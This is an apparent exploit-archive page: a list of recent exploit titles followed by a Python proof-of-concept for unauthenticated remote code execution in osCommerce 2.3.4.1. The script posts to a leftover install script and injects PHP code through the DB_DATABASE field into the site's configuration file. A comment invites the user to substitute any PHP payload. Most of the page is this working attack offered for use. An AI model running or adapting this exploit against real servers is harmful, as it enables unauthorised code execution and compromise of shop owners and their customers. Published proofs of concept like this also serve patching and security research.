
23 changes to exploits/shellcodes SysGauge 4.5.18 - Local Denial of Service Systematic SitAware - NVG Denial of Service Allok AVI DivX MPEG to DVD Converter 2.6.1217 - Buffer Overflow (SEH) Allok Video Joiner 4.6.1217 - Stack-Based Buffer Overflow Allok WMV to AVI MPEG DVD WMV Converter 4.6.1217 - Buffer Overflow Faleemi Windows Desktop Software - (DDNS/IP) Local Buffer Overflow Advantech WebAccess < 8.1 - webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow osTicket 1.10 - SQL Injection osTicket 1.10 - SQL Injection (PoC) Open-AuditIT Professional 2.1 - Cross-Site Request Forgery Homematic CCU2 2.29.23 - Arbitrary File Write MiniCMS 1.10 - Cross-Site Request Forgery WordPress Plugin Relevanssi 4.0.4 - Reflected Cross-Site Scripting WordPress Plugin Contact Form 7 to Database Extension 2.10.32 - CSV Injection Homematic CCU2 2.29.23 - Remote Command Execution Joomla! Component Acymailing Starter 5.9.5 - CSV Macro Injection Joomla! Component AcySMS 3.5.0 - CSV Macro Injection WordPress Plugin WP Security Audit Log 3.1.1 - Sensitive Information Disclosure Tenda W308R v2 Wireless Router 5.07.48 - Cookie Session Weakness Remote DNS Change osCommerce 2.3.4.1 - Remote Code Execution Tenda W316R Wireless Router 5.07.50 - Remote DNS Change D-Link DIR-850L Wireless AC1200 Dual Band Gigabit Cloud Router - Authentication Bypass Tenda FH303/A300 Firmware V5.07.68_EN - Remote DNS Change Vtiger CRM 6.3.0 - Authenticated Arbitrary File Upload (Metasploit) Tenda W3002R/A302/w309r Wireless Router V5.07.64_en - Remote DNS Change (PoC)
40 lines
No EOL
1.8 KiB
Python
Executable file
40 lines
No EOL
1.8 KiB
Python
Executable file
# Exploit Title: osCommerce 2.3.4.1 Remote Code Execution
|
|
# Date: 29.0.3.2018
|
|
# Exploit Author: Simon Scannell - https://scannell-infosec.net <contact@scannell-infosec.net>
|
|
# Version: 2.3.4.1, 2.3.4 - Other versions have not been tested but are likely to be vulnerable
|
|
# Tested on: Linux, Windows
|
|
|
|
# If an Admin has not removed the /install/ directory as advised from an osCommerce installation, it is possible
|
|
# for an unauthenticated attacker to reinstall the page. The installation of osCommerce does not check if the page
|
|
# is already installed and does not attempt to do any authentication. It is possible for an attacker to directly
|
|
# execute the "install_4.php" script, which will create the config file for the installation. It is possible to inject
|
|
# PHP code into the config file and then simply executing the code by opening it.
|
|
|
|
|
|
import requests
|
|
|
|
# enter the the target url here, as well as the url to the install.php (Do NOT remove the ?step=4)
|
|
base_url = "http://localhost//oscommerce-2.3.4.1/catalog/"
|
|
target_url = "http://localhost/oscommerce-2.3.4.1/catalog/install/install.php?step=4"
|
|
|
|
data = {
|
|
'DIR_FS_DOCUMENT_ROOT': './'
|
|
}
|
|
|
|
# the payload will be injected into the configuration file via this code
|
|
# ' define(\'DB_DATABASE\', \'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\');' . "\n" .
|
|
# so the format for the exploit will be: '); PAYLOAD; /*
|
|
|
|
payload = '\');'
|
|
payload += 'system("ls");' # this is where you enter you PHP payload
|
|
payload += '/*'
|
|
|
|
data['DB_DATABASE'] = payload
|
|
|
|
# exploit it
|
|
r = requests.post(url=target_url, data=data)
|
|
|
|
if r.status_code == 200:
|
|
print("[+] Successfully launched the exploit. Open the following URL to execute your code\n\n" + base_url + "install/includes/configure.php")
|
|
else:
|
|
print("[-] Exploit did not execute as planned") |